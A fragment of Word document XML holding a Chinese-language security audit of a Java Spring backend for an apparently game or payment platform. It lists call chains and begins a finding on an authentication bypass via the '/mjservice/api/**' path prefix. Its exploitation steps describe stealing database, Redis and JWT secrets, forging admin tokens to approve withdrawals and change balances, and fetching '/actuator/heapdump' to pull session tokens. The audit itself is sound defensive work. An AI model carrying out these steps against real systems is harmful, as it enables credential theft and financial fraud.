      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>datasource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等关键字，可提取数据库连接串（账号密码）、Redis 认证密码、JWT 签发密钥、第三方支付/游戏平台 API 密钥等高价值凭证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用获取到的数据库凭证直连数据库，直接读写用户余额、提现记录、资金流水等核心数据表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">或利用获取到的 JWT 密钥，自行构造并签发包含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>adminId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / 高权限角色声明的 Token，调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/adminManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等管理端资金接口执行提现审批、余额修改等操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /actuator/heapdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下载 JVM 堆内存镜像（二进制响应），用 Eclipse Memory Analyzer（MAT）打开，可进一步提取内存中活跃用户 Session Token、AES/DES 解密后的明文、已登录管理员的身份凭证等。</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37"/>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否，完全无需认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：互联网任意来源均可直接访问，无任何限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 17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受影响调用链（11 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>自身</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.shouldNotFilter → AdminAuthFilter.java.isPublicPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.shouldNotFilter → AdminAuthFilter.java.isManagementPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.doFilterInternal → MenuManageService.java.hasApiPermission → AdminMenu.java.getApiPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.doFilterInternal → ApiResponse.java.error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.doFilterInternal → AdminUser.java.setStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter.java.doFilterInternal → AdminUser.java.getIsSuper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminWriteCsrfGuardFilter.java.shouldNotFilter → AdminWriteCsrfGuardFilter.java.isManagementPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminWriteCsrfGuardFilter.java.doFilterInternal → ApiResponse.java.error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.java.isPermitPath → SecurityConfig.java.isAdminPublicPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataOverviewController.java.rewardMetrics → DataOverviewService.java.getRewardMetrics → DataOverviewService.java.addRewardRow</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audit_m009_009_isManagementPath_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m010_020_shouldNotFilter_ctrl-path2of3.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m010_028_shouldNotFilter_ctrl-path3of3.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m011_062_doFilterInternal_ctrl-path5of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m011_155_doFilterInternal_ctrl-path9of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m011_169_doFilterInternal_ctrl-path10of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m011_184_doFilterInternal_ctrl-path11of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m013_029_shouldNotFilter_ctrl-path3of3.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m014_021_doFilterInternal_ctrl-path2of2.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m018_019_isPublicPath_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m020_024_RequestLoggingFilter_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m027_034_addIgnorePath_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m028_036_RequestTimingFilter_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m029_037_doFilterInternal_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m032_040_isAdminPublicPath_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m033_041_isPermitPath_ctrl-path1of1.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m037_045_getNormalizedPath_ctrl-self.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m067_194_rewardMetrics_ctrl-path1of3.md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：TokenAuthFilter.java#isNoTokenPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_4" w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞3：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径前缀绕过全链路认证鉴权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="5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/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径前缀绕过 TokenAuthFilter 与 SignAuthTestFilter 双重认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="5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src/main/java/com/gameBack/mjservice/config/TokenAuthFilter.java:isNoTokenPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="5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：认证绕过 / 未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="5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5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：未授权（无需任何 Token 或签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="5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SecurityConfig.isPermitPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法显式将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径前缀纳入 Spring Security 放行名单，与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并列处理。然而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.isNoTokenPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅检查路径是否以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头来决定是否执行 Bearer Token 鉴权，对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径一律返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（即"无需 Token，跳过过滤"）。同理，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
